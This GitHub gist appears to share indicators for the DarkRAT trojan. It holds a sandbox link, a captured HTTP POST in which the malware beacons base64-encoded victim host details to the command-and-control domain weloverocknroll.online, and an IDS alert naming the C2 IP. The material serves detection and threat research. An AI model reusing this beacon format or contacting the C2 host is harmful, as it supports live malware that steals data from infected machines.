Skip to content

Instantly share code, notes, and snippets.

@malwareforme
Created August 15, 2019 14:16
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save malwareforme/2ca4771d981f061a8c5054416049fefd to your computer and use it in GitHub Desktop.
Save malwareforme/2ca4771d981f061a8c5054416049fefd to your computer and use it in GitHub Desktop.
darkrat
https://app.any.run/tasks/c9b7183c-011b-4a50-96cc-b09c2876b183/
POST /request HTTP/1.1
Accept: text/plain
Content-Type: application/x-www-form-urlencoded
User-Agent: rvOgJiq
Host: weloverocknroll.online
Content-Length: 640
request=YUhkcFpEMWxaV1ZpTldRMU5DMDNPRGd3TFRReVlUY3RZalUwTWkwM016bGlZbU15Tm1ObU5HSW1ZMjl0Y0hWMFpYSnVZVzFsUFZWVFJWSXRVRU1tWVc5eWJtOTBQV1poYkhObEptbHVjM1JoYkd4bFpGSmhiVDB6TGprNU9UWXhPU1p1WlhSR2NtRnRaWGR2Y21zeVBYUnlkV1VtYm1WMFJuSmhiV1YzYjNKck16MTBjblZsSm01bGRFWnlZVzFsZDI5eWF6TTFQWFJ5ZFdVbWJtVjBSbkpoYldWM2IzSnJORDEwY25WbEptRnVkR2wyYVhKMWN6MG1ZbTkwZG1WeWMybHZiajB5TGpFdU15Wm5jSFZPWVcxbFBXUkhPV3RpZHowOUptTndkVTVoYldVOVUxYzFNRnBYZDI5VmFXdG5VVEk1ZVZwVGFGVlVVMnRuWVZSVmRFNXFVWGROUTBKRVZVWlZaMUZEUVhsTWFtTjNVakJvTmlaaGNtTm9QV1ZFV1RBbWIzQmxjbWx1WjNONWMzUmxiVDFXTW14MVdrYzVNMk41UVROSlJrNXNZMjVhY0ZreVZXZFZSMFpxWVhsQmVDWnpjSEpsWVdSMFlXYzliV0ZwYmc9PQ==
========================SID HITS========================
08/02/2019-16:50:20.342727 [**] [1:2837970:2] ETPRO TROJAN Win32/DarkRAT CnC Activity [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.100.18:49205 -> 149.129.174.115:80
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment